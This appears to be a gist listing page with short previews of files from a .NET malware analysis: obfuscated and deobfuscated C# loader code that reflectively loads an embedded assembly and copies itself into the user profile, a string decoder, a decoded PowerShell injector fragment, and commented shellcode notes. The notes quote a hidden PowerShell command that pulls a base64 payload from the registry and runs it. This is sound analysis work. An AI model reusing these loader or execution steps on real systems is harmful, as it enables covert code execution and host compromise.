View passthru.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Text; | |
using System.Threading.Tasks; | |
namespace passthru | |
{ | |
class Program | |
{ |
View dotnet_malware_article_obfuscated_full.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private static void pwS3x7Sg(string[] HA36XMPY) | |
{ | |
int num = 5; | |
string text; | |
string a; | |
string location; | |
byte[] xnnXVZCo; | |
Assembly assembly; | |
string a2; | |
for (;;) |
View dotnet_malware_article_obfuscated_partial.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private static void pwS3x7Sg(string[] HA36XMPY) | |
{ | |
int num = 5; | |
string text; | |
string a; | |
string location; | |
byte[] xnnXVZCo; | |
Assembly assembly; | |
string a2; | |
for (;;) |
View dotnet_malware_article_deobfuscated.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private static void pwS3x7Sg(string[] args) { | |
Assembly executingAssembly = Assembly.GetExecutingAssembly(); | |
byte[] xnnXVZCo = rYChEj24.m861PYDG(executingAssembly); | |
byte[] xnnXVZCo2 = rYChEj24.Q8sHxNtH(executingAssembly); | |
Assembly assembly = Assembly.Load(rYChEj24.ygv4ageb(xnnXVZCo2)); | |
string a = DFsEYbtO.smethod_1(293); | |
string a2 = DFsEYbtO.smethod_1(302); | |
string location = Assembly.GetEntryAssembly().Location; | |
string text = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + DFsEYbtO.smethod_1(311) + Path.GetFileName(location); | |
if (a2 == DFsEYbtO.smethod_1(316) && !File.Exists(text)) { |
View dotnet_malware_article_convert_resource.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
static void Main() | |
{ | |
try | |
{ | |
//IntPtr fResource = FindResource(new IntPtr(0), new IntPtr(130), new IntPtr(23)); | |
//uint sResource = SizeofResource(new IntPtr(0), fResource); | |
//IntPtr lResource = LoadResource(new IntPtr(0), fResource); | |
//IntPtr dResource = LockResource(lResource); | |
//CtNmG = new byte[sResource]; |
View dotnet_malware_article_decode.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
encoded_datastring = "pvlkb%V|vq`h>\b\u000fpvlkb%V|vq`h+LJ>\b\u000fpvlkb%V|vq`h+Q`}q>\b\u000fpvlkb%V|vq`h+W`ci`fqljk>\b\u000fpvlkb%V|vq`h+Qmw`dalkb>\b\u000fpvlkb%V|vq`h+Wpkqlh`+Lkq`wjuV`wslf`v>\b\u000fpvlkb%V|vq`h+Awdrlkb>\b\u000f\b\u000fkdh`vudf`%HBfrR}vhhbK_\b\u000f~\b\u000f\fupgilf%fidvv%lAu}~upgilf%sjla%wGKc-,~\b\u000fvmjwq%Mh|p%8%(43457>%\u000f%g|q`^X%Mh|pMh|p%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'Mh|p',>cijdq%FpJF%8%6+017104@(5<C>%\u000fvmjwq%`rsV%8%44270>%\u000f%g|q`^X%`rsV`rsV%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'`rsV',>pijkb%nhgG%8%47=7=32151133040<>%\u000f\b\u000fxupgilf%sjla%|fB@-,~\b\u000flkq%U_rI%8%176<=0>%\u000frmli`-U_rI%88%176<=0,~\b\u000fU_rI%8%U_rI%.%702154>\b\u000fxijkb%SbNm%8%4<74=04541520<522>%\u000flkq%VrnW%8%31445=22>%\u000flc-VrnW%88%45272<,~\b\u000fVrnW%8%VrnW%.%713440>\b\u000fxvqwlkb%rLBA%8%'IjcP'>%\u000f%Fjkvji`+Rwlq`Ilk`-rLBA,>\b\u000fxupgilf%sjla%QNFF-,~\b\u000fijkb%U@WV%8%3573524<6<<5265<=>%\u000fvmjwq%|]qt%8%421<7>%\u000f%g|q`^X%|]qt|]qt%8%V|vq`h+LJ+Cli`+W`daDiiG|q`v-'|]qt',>pijkb%FfQs%8%24< |
View dotnet_malware_article_decoded.cs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Text; | |
using System.Reflection; | |
using System.Threading; |
View powershell_payload_decoded.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Formatting tweaked for readablity as an embedded gist, will not execute | |
# commented as well | |
Set-StrictMode -Version 2 | |
$DoIt = @' | |
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ( | |
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { |
View powershell_payload_shellcode.asm
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; shellcode found on Windows host. Payload was stored in the registry. Powershell | |
; was used to extract it from the registry and execute it: | |
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \ | |
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \ | |
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d" | |
; The following references were used to help comment the shellcode | |
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm | |
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/ |
View bgzip.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import gzip | |
import base64 | |
import StringIO | |
# python bgzip.py | |
# H4sIAErhF1wC/8tIzcnJBwCGphA2BQAAAA== | |
# hello | |
def gzip_and_base64(s): | |
out = StringIO.StringIO() |
OlderNewer